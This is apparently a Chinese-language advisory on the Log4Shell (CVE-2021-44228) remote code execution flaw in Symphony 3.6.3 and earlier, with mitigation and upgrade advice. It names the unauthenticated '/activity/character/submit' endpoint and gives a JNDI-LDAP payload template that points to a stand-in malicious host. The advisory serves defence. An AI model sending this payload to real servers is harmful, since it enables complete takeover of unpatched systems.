Symphony 3.6.3及以下版本Log4j2远程命令执行问题分析

问题背景

Symphony是一款开源社区系统，在3.6.3及更早版本中使用了存在安全问题的Log4j组件。Log4j是Apache基金会下的一个Java日志记录工具，其2.x版本曾曝出严重的安全问题（CVE-2021-44228），攻击者可通过构造特殊的日志信息触发问题，最终导致服务器被完全控制。

问题原理

该问题源于Log4j2提供的JNDI查找功能，当系统记录包含特定格式的字符串（如${jndi:ldap://恶意地址/攻击载荷}）的日志时，Log4j会尝试通过JNDI从远程服务器获取对象并执行，这为攻击者提供了远程代码执行的机会。

在Symphony 3.6.3中，攻击者可以通过特定接口"/activity/character/submit"提交恶意构造的请求参数，这些参数会被系统记录到日志中。由于使用了存在问题的Log4j版本，当这些恶意日志被记录时就会触发问题执行链。

问题复现分析

1. 攻击入口点：系统提供的"/activity/character/submit"接口
2. 攻击载荷：通过该接口提交包含JNDI查找的恶意字符串
3. 触发过程：
   • 攻击者向接口发送精心构造的请求
   • 系统将请求参数记录到日志
   • Log4j处理日志时解析并执行JNDI查找
   • 从攻击者控制的LDAP服务器加载恶意类
   • 恶意类在服务器上执行任意代码

问题影响

该问题具有以下严重特性：

• 无需认证即可利用
• 可导致服务器完全沦陷
• 攻击载荷可隐藏在正常请求中
• 互联网上仍有大量未升级的实例

修复方案

项目维护者已在3.6.4版本中升级了Log4j依赖，建议所有用户立即升级到最新版本。对于无法立即升级的用户，可采取以下临时缓解措施：

1. 设置JVM参数：-Dlog4j2.formatMsgNoLookups=true
2. 移除log4j-core组件中的JndiLookup类
3. 限制外连网络访问

安全建议

对于使用开源组件的系统，建议：

1. 建立组件依赖清单
2. 定期扫描已知问题
3. 订阅安全公告
4. 制定应急响应计划
5. 最小化日志记录敏感信息

该案例再次提醒我们，即使是广泛使用的开源组件也可能存在严重安全隐患，及时更新依赖是保障系统安全的重要措施。